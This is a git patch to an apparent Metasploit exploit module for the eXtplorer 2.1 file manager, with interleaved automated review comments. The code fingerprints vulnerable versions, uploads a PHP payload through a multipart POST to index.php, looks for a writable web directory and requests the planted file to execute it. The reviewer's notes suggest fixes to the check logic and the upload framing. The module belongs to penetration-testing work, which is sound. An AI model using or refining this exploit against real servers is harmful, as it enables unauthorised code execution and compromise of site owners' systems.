From 52157b91246af136a70bb1b0e92ef8a87b3486bb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 9 Jan 2013 19:45:17 +0100 Subject: [PATCH] extplorer_upload_exec cleanup --- .../multi/http/extplorer_upload_exec.rb | 75 +++++++++---------- 1 file changed, 34 insertions(+), 41 deletions(-) diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index b8b9213ab4..12e1ec1dc2 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -30,16 +30,13 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ - ['URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability'], - ['URL', 'http://extplorer.net/issues/105'] + [ 'OSVDB', '88751' ], + [ 'BID', '57058' ], + [ 'URL', 'http://itsecuritysolutions.org/2012-12-31-eXtplorer-v2.1-authentication-bypass-vulnerability' ], + [ 'URL', 'http://extplorer.net/issues/105' ] ], 'Payload' => { - 'BadChars' => "\x00" - }, - 'DefaultOptions' => - { - 'ExitFunction' => "none" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, @@ -71,9 +68,18 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "#{base}extplorer.xml" }) - return Exploit::CheckCode::Vulnerable if res and res.code == 200 and res.body =~ /2\.1\.(0RC5|0|1|2)<\/version>/ - return Exploit::CheckCode::Detected if res and res.code == 200 and res.body =~ /eXtplorer/ - return Exploit::CheckCode::Safe + if !res or res.code != 200 + return Exploit::CheckCode::Safe + end + + if res.body =~ /2\.1\.0RC[012]<\/version>/ + return Exploit::CheckCode::Vulnerable + end + + if res.body =~ /eXtplorer/ + return Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("#{peer} - Connection failed") end 
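Review bot: In the `check` hunk, a response that contains `eXtplorer` but no matching version string now returns `Exploit::CheckCode::Safe`, and a body matching neither pattern falls off the end of the method and returns nil, because the unconditional final return was removed. An installation that is recognised but not version-matched is better reported with `return Exploit::CheckCode::Detected`, and the `!res` case and the last statement before `rescue` should be `return Exploit::CheckCode::Unknown`, since a missing or unrecognised response says nothing about the target's patch state. The rescue branch likewise returns the value of `print_error` rather than a check code. The version pattern also changed from `2\.1\.(0RC5|0|1|2)` to `2\.1\.0RC[012]`, which no longer matches 2.1.0RC5 or the 2.1.0 to 2.1.2 releases; the commit message calls this a cleanup, so it is worth confirming against the referenced advisory that the narrowing is intended.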
@@ -92,29 +98,22 @@ class Metasploit3 < Msf::Exploit::Remote def upload(base, dir, fname, file) - boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}" - data_post = "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"userfile[0]\"; filename=\"#{fname}\"\r\n" - data_post << "Content-Type: application/x-httpd-php\r\n" - data_post << "\r\n#{file}\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"overwrite_files\"\r\n\r\non\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"dir\"\r\n\r\n%2f#{dir}\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"option\"\r\n\r\ncom_extplorer\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"requestType\"\r\n\r\nxmlhttprequest\r\n" - data_post << "--#{boundary}\r\n" - data_post << "Content-Disposition: form-data; name=\"confirm\"\r\n\r\ntrue\r\n" - data_post << "--#{boundary}\r\n" + data = Rex::MIME::Message.new + data.add_part(file, 'application/x-httpd-php', nil, "form-data; name=\"userfile[0]\"; filename=\"#{fname}\"") + data.add_part("on", nil, nil, "form-data; name=\"overwrite_files\"") + data.add_part("%2f#{dir}", nil, nil, "form-data; name=\"dir\"") + data.add_part("com_extplorer", nil, nil, "form-data; name=\"option\"") + data.add_part("upload", nil, nil, "form-data; name=\"action\"") + data.add_part("xmlhttprequest", nil, nil, "form-data; name=\"requestType\"") + data.add_part("true", nil, nil, "form-data; name=\"confirm\"") + + data_post = data.to_s + data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}index.php", - 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", 
'data' => data_post, 'cookie' => datastore['COOKIE'], }) @@ -149,8 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /Are you sure you want to delete these/ print_status("#{@peer} - Authenticated successfully") else - print_error("#{@peer} - Authentication failed") - return + fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") end # search for writable directories @@ -163,8 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => "option=com_extplorer&action=getdircontents&dir=#{base}&sendWhat=dirs&node=ext_root", }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{@peer} - Connection failed") - return + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end if res and res.code == 200 and res.body =~ /\{'text':'([^']+)'[^\}]+'is_writable':true/ dir = "#{base}#{$1}" @@ -182,12 +179,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /'message':'Upload successful\!'/ print_good("#{@peer} - File uploaded successfully") else - print_error("#{@peer} - Uploading PHP payload failed") - return + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{@peer} - Connection failed") - return + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end # search directories in the web root for the file @@ -200,8 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => datastore['COOKIE'], }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{@peer} - Connection failed") - return + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end if res and res.code == 200 and res.body =~ /'dir':'\\\/([^']+)'/ dir = $1.gsub('\\','') 
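Review bot: The `data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')` line in `upload` uses `^`, which in Ruby matches at the start of every line, so combined with `gsub` it also removes the CRLF in front of any later boundary whose preceding part body ends in a newline, which would break the multipart framing. The intent appears to be dropping only the leading CRLF at the start of `data.to_s`, so anchor on the string start and replace once: `data_post = data.to_s.sub(/\A\r\n(?=--_Part_)/, '')`. A comment such as `# strip the CRLF emitted before the first boundary` would record why the line exists, since it relies on the `_Part_` boundary prefix, which looks like an internal detail of Rex::MIME::Message.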
@@ -218,8 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "/#{dir}/#{@fname}" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{@peer} - Connection failed") - return + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end if res and res.code != 200 print_error("#{@peer} - Executing payload failed")